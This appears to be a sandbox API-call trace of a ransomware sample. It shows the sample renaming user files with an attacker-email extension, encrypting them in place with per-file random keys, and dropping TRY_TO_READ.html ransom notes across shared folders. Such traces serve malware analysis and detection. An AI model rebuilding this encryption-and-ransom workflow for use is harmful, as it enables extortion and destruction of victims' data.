	[0100.160] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.160] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\os_gujp6u1.flv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\os_gujp6u1.flv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.164] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\os_gujp6U1.flv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\os_gujp6u1.flv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8
	[0100.165] GetProcessHeap () returned 0x540000
	[0100.165] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.165] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=100730) returned 1
	[0100.165] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1897a
	[0100.165] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.165] GetProcessHeap () returned 0x540000
	[0100.165] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.165] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.165] WriteFile (in: hFile=0x4b8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.166] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.166] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.167] ReadFile (in: hFile=0x4b8, lpBuffer=0x605bb8, nNumberOfBytesToRead=0x1897a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x605bb8*, lpNumberOfBytesRead=0x3a1f778*=0x1897a, lpOverlapped=0x0) returned 1
	[0100.168] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.169] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.169] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.169] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 49
	[0100.169] GetProcessHeap () returned 0x540000
	[0100.169] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc8) returned 0x5919d0
	[0100.169] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini"
	[0100.169] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.169] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.172] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8
	[0100.172] GetProcessHeap () returned 0x540000
	[0100.172] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0100.172] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=504) returned 1
	[0100.172] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1f8
	[0100.172] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.172] GetProcessHeap () returned 0x540000
	[0100.172] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.172] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.172] WriteFile (in: hFile=0x4b8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.173] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.173] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.173] ReadFile (in: hFile=0x4b8, lpBuffer=0x3a20048, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20048*, lpNumberOfBytesRead=0x3a1f778*=0x1f8, lpOverlapped=0x0) returned 1
	[0100.173] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=-504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.173] WriteFile (in: hFile=0x4b8, lpBuffer=0x5fb388*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesWritten=0x3a1f778*=0x1f8, lpOverlapped=0x0) returned 1
	[0100.174] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.174] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.174] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi", dwFileAttributes=0x80) returned 1
	[0100.174] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi") returned 61
	[0100.174] GetProcessHeap () returned 0x540000
	[0100.174] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x601bd0
	[0100.174] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi"
	[0100.174] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.174] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\awffyl9o4oj8giwh3di.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\awffyl9o4oj8giwh3di.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.176] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aWffYl9o4oJ8giwH3DI.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\awffyl9o4oj8giwh3di.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b8
	[0100.176] GetProcessHeap () returned 0x540000
	[0100.176] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0100.176] GetFileSizeEx (in: hFile=0x4b8, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=60281) returned 1
	[0100.176] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xeb79
	[0100.176] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.176] GetProcessHeap () returned 0x540000
	[0100.176] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.176] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.176] WriteFile (in: hFile=0x4b8, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.177] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.177] WriteFile (in: hFile=0x4b8, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.177] ReadFile (in: hFile=0x4b8, lpBuffer=0x605bb8, nNumberOfBytesToRead=0xeb79, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x605bb8*, lpNumberOfBytesRead=0x3a1f778*=0xeb79, lpOverlapped=0x0) returned 1
	[0100.178] SetFilePointer (in: hFile=0x4b8, lDistanceToMove=-60281, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.178] WriteFile (in: hFile=0x4b8, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0xeb79, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0xeb79, lpOverlapped=0x0) returned 1
	[0100.180] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da770
	[0100.180] FindNextFileW (in: hFindFile=0x5da770, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.180] FindNextFileW (in: hFindFile=0x5da770, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1
	[0100.180] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\Acrobat\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\acrobat\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc
	[0100.182] FindNextFileW (in: hFindFile=0x5da770, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1
	[0100.182] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\arm\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4bc
	[0100.183] FindNextFileW (in: hFindFile=0x5da770, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.183] FindNextFileW (in: hFindFile=0x5da770, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.183] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Application Data\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0100.183] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Desktop\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0100.183] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Documents\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0100.183] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Favorites\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7d8d10, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0100.184] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da7b0
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x896b9210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x896b9210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hx.hxn", cAlternateFileName="")) returned 1
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.14.1033.hxn", cAlternateFileName="MSEXCE~1.HXN")) returned 1
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.DEV.14.1033.hxn", cAlternateFileName="MSEXCE~2.HXN")) returned 1
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GRAPH.14.1033.hxn", cAlternateFileName="MSGRAP~1.HXN")) returned 1
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfd789af0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd789af0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd822070, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GROOVE.14.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11446a50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATH.14.1033.hxn", cAlternateFileName="MSINFO~1.HXN")) returned 1
	[0100.185] FindNextFileW (in: hFindFile=0x5da7b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1146cbb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATHEDITOR.14.1033.hxn", cAlternateFileName="MSINFO~2.HXN")) returned 1
